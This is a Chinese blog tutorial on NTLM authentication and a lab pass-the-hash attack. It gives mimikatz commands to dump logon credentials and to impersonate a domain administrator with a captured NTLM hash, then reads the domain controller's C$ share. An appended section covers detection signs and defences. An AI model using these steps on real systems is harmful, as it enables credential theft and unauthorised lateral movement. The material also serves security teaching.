内网渗透(哈希传递)

概念

早期SMB协议明文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM。

哈希传递前提

同密码(攻击主机与实现主机两台要密码一致)。

NTLM协议

加密ntlm哈希

转换成16进制——转换成加密——转换成MD4

image-20231128092813236

NTLM协议:用于远程登录。例如 22

原理

  1. client(win10)将账户名(test)传给server。
  2. 在server中判断本地账户名(test)是否存在,没有就失败,有的话生成challenge(随机生成的),查找user对应的NTLM哈希(在sam里找),使用哈希加密challenge,生成一个net-ntlm hash存在内存中,将challenge发送给client(win10)。
  3. client(win10)接受到challenge以后,将自己的密码转换成NTLM哈希,用生成的哈希加密challenge生成response,将response发送给server。
  4. server对比自己内存中的net-ntlm hash与client(win10)发来的response是否一致。

image-20231128103710255

哈希传递攻击

哈希传递攻击的前提

  • 首先是管理员,必须提前从不同用户变成管理员
  • 需要用户名和ntml哈希值
  • 如果对方主机在域内,就使用域名;如果不在域内,就使用工作组环境的攻击方式

什么情况下会用哈希传递攻击

  • 攻陷一台主机以后,抓不到该主机用户的明文密码
  • 失陷主机和局域网内存在相同密码

哈希传递攻击

工具:mimikatz

环境:域控(server 2008)、客户机(win 7)

网段:在同一网段,都为NAT模式

域控(server)

  • 静态IP:10.1.1.1

在server中查看445是否开放

image-20231128101209454

  • 查看域控C盘

image-20231128200621745

  • 共享C盘(在cmd中输入命令net share

image-20231128204722954

客户端开始攻击(win7)

  • IP:10.1.1.2

  • 关闭杀毒软件

用mimikatz64位工具,必须是system权限

image-20231128201649767

在打开cmd命令解释器必须以管理员身份运行(因为要用到mimikatz工具)

image-20231128201723269

进入mimikatz.exe

image-20231128202127467

攻击利用

  • 提升权限(注:需以管理员权限运行)
privilege::debug

image-20231128203351700

  • 获取内存中保存的登录信息
sekurlsa::logonpasswords 

image-20231128203539731

  • 并抓到自己用户的哈希值(NTLM)

image-20231128203703522

  • 进行哈希攻击
sekurlsa::pth /user:administrator /domain:xiusafe.com /ntlm:32ed87bdb5fdc5e9cba88547376818d4  #pth是哈希传递,domain后面跟的是域

image-20231128205345577

  • 同时弹出一个新的cmd窗口

image-20231128205433846

此时哈希值已经准备好,但还未攻击

开始攻击

  • 查看域控(server)C盘
dir \\10.1.1.1\c$

image-20231128205229403

  • 与域控C盘进行对比

image-20231128200621745

  • 攻击成功

总结

哈希传递攻击是由于局域网内有多台主机存在相同密码造成的,绕过ntlm认证。

### 内网横向渗透攻击的网络流量特征 在网络环境中,内网横向移动是指攻击者在成功入侵一个内部主机后,在同一网络内的其他计算机之间传播的行为。这种行为通常伴随着特定类型的网络活动模式。 #### SMB协议异常使用 由于许多横向移动依赖于Windows操作系统中的服务消息块(SMB)协议来访问文件共享和其他资源,因此频繁或不寻常的SMB请求可能表明存在潜在的风险。例如,当`CrackMapExec`这样的工具被用来扫描整个域环境时,它会通过发送大量的SMB连接尝试到不同的IP地址来进行枚举操作[^2]。 #### 远程执行命令和服务控制管理器(RPC/SCM) 攻击者可能会利用远程过程调用(RPC)接口以及服务控制管理器(SCM),这些都可能导致非标准端口上的通信增加,尤其是TCP 135, 445等端口。此外,如果观察到了来自已知合法进程之外的新建计划任务或者启动的服务实例,则应引起注意。 #### DNS查询激增 为了发现更多可攻破的目标机器,恶意软件常常会对域名服务器(DNS)发起大量查询请求以获取有关目标系统的更多信息。这可以表现为短时间内DNS日志中出现了过多关于未授权子网范围内的名称解析记录。 #### 非法凭证传递(PtH/PtT) Pass-the-Hash (PtH) 和 Pass-the-Ticket (PtT) 技术允许攻击者无需知道明文密码即可冒充用户身份登录并获得权限。这类事件会在认证过程中留下痕迹,比如Kerberos票据授予票证(TGT)分发次数增多或是NTLM哈希验证失败率上升等情况。 --- ### 安全防护措施 对于上述提到的各种流量特点所对应的防御方法如下: #### 实施严格的最小特权原则 确保所有账户只拥有完成其工作所需的最低限度权利,并定期审查和调整权限设置。这样即使某个节点遭到破坏,也能减少进一步扩散的可能性。 #### 加强监控与检测机制 部署先进的EDR(Endpoint Detection and Response)/XDR扩展型威胁响应平台,它们能够实时监测可疑行为并对异常情况进行告警;同时配合SIEM系统收集多源数据进行关联分析找出隐藏较深的日志线索。 #### 更新补丁及时修复漏洞 保持操作系统及相关应用程序处于最新状态非常重要,因为很多横向移动都是基于已公开但尚未修补的安全缺陷展开的。组织应该建立有效的补丁管理系统,快速响应新发布的安全更新。 #### 教育员工提高意识水平 最后也是最容易忽视的一环就是人的因素——培训工作人员识别钓鱼邮件、社会工程学陷阱以及其他形式的社会欺骗手段,从而降低人为失误带来的风险敞口。 ```bash # 使用防火墙规则限制不必要的外部连接 sudo iptables -A OUTPUT -p tcp --dport 445 -j DROP ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值